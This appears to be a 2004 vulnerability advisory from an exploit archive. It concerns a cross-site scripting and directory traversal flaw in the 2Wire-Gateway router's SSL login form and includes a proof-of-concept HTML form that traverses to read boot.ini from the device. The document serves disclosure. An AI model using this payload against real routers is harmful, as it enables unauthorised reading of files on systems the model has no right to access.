2WireGateway.txt

2WireGateway.txt: Posted Jan 21, 2004; Authored by Rafel Ivgi | Site theinsider.deep-ice.com; 2Wire-Gateway is a router that has a webserver for maintenance. The CGI interface lacks input validation when returning an error with its return variable allowing for a directory traversal attack.; tags | exploit, cgi; SHA-256 | 7d327c33155ca85a9c8ffbe857abf59b58c2dd8d41a1f071dd99da63cc51605a; Download | Favorite | View

2WireGateway.txt

#######################################################################

Application:    2Wire-Gateway/WebGateway
Vendor:           http://www.2wire.com
Versions:        All
Platforms:       Windows
Bug:          Cross Site Scripting and Directory traversal bug in SSL Form
Authentification
Risk:                high
Exploitation:   Remote with browser
Date:               25 Dec 2003
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@mail.com
web:                http://theinsider.deep-ice.com

#######################################################################

1) Introduction
2) Bug
3) The Code

#######################################################################

===============
1) Introduction
===============

2Wire is a communication company that sells internet and network related
devices, such
as routers. 2Wire most common routers webserver is "2Wire-Gateway". It
includes a SSL
(Secure Sockets Layer) form authentification.


#######################################################################

======
2) Bug
======

The SSL (Secure Sockets Layer) form authentification has a XSS(Cross Site
Scripting)
that allows an attacker to change the forms action parameters. An attacker
is able to inject script
and urls into the forms action an by that Transverse Directories on the
server.
This allows him to see and download any file in the remote system knowing
the path.
How ever exploiting this vulnerabillity is very hard because the attacker
has to connect
to the target through the browser and accept the SSL connection , exploit is
very hard to reproduce.

#######################################################################

===========
3) The Code
===========

<form name="wralogin" method="get"
action="http://<host>/wra/public/wralogin/?error=61&return=password/../../..
/../boot.ini">
<input type="hidden" name="authcode" value="MUQmqC/sBiXfslfYEooIJg==">
<center>
<input type="password" name="password" value="">
<input type="submit" alt="Submit" width="58" height="19" border="0"></td>
</form>
</body>
</html>

#######################################################################

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

2WireGateway.txt

2WireGateway.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

2WireGateway.txt

Share This

2WireGateway.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems